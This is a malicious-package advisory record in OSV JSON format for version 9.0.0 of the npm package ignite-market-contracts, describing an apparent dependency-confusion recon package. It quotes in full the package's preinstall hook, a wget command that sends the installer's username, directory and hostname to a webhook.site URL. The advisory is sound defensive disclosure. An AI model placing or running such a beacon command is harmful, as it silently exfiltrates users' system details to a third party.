{"id":"MAL-2026-4582","summary":"Malicious code in ignite-market-contracts (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc)\nThe package's preinstall lifecycle hook in package.json runs `wget --quiet \"https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"`, which fires automatically on `npm install` and transmits the installer's username, current working directory, and hostname to a third-party anonymous webhook collector. This is a recon beacon characteristic of dependency-confusion attacks: the installer-identifying data is sent to an attacker-controlled endpoint without consent. The package additionally has placeholder metadata (author 'me', empty description), a name that resembles legitimate marketplace/seaport contract packages, and declares a non-canonical dependency `seaport-core-16` — all consistent with a dependency-confusion PoC or active recon stage targeting internal package namespaces.\n","modified":"2026-05-26T06:02:36.272873474Z","published":"2026-05-22T00:15:50Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-004100","versions":["9.0.0"],"modified_time":"2026-05-22T00:15:50Z","source":"amazon-inspector","sha256":"3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc","import_time":"2026-05-26T05:51:56.295933915Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ignite-market-contracts/v/9.0.0"}],"affected":[{"package":{"name":"ignite-market-contracts","ecosystem":"npm","purl":"pkg:npm/ignite-market-contracts"},"versions":["9.0.0"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contracts/MAL-2026-4582.json","indicators":{"evidence_files":[{"path":"package.json","tlsh":"a4f07d799530eb571ac64f900820929ef271fa0b94412e0dde7323dd418e9db2479858","sha256":"f8cb1efede8db0abca22b048e81c867ecb571053504c07ccb3c3f332aca048e8"}],"package_integrity":[{"hashes":{"sha1":"3f80fd99f6bbee976c855b14f1e2e105605f7d4a","sha512_sri":"sha512-cEZOYHqu7Xw7V9SiaNM4aQ5ZE2keu4Zsdsa7z5HBCqZBDZRwgz/YlIcVxT8Q6rxWBwtMhq4FGhvos/+RqacBYQ=="},"filename":"ignite-market-contracts-9.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}